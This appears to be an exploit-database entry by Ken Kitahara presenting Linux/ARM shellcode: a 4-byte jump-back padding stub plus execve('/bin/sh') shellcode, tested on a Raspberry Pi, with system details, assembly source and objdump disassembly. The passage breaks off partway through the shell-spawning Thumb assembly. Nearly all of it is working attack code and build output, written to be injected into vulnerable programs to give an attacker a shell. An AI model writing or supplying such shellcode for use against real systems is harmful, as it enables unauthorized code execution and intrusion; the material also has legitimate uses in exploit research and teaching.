4 bytes small Linux/ARM jump back shellcode + execve("/bin/sh", NULL, NULL) shellcode.
45872f193eae1e28e15f9a455e099d4b
/*
# Title: Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)
# Date: 2018-09-18
# Author: Ken Kitahara
# Tested: armv7l (Raspberry Pi 3 Model B+)
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Shellcode]
(1) Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat padding.s
.section .text
.global _start
_start:
eor r7, r7, r7
pi@raspberrypi:~ $ as -o padding.o padding.s && ld -N -o padding padding.o
pi@raspberrypi:~ $ objdump -d ./padding
./padding: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e0277007 eor r7, r7, r7
pi@raspberrypi:~ $
(2) execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0,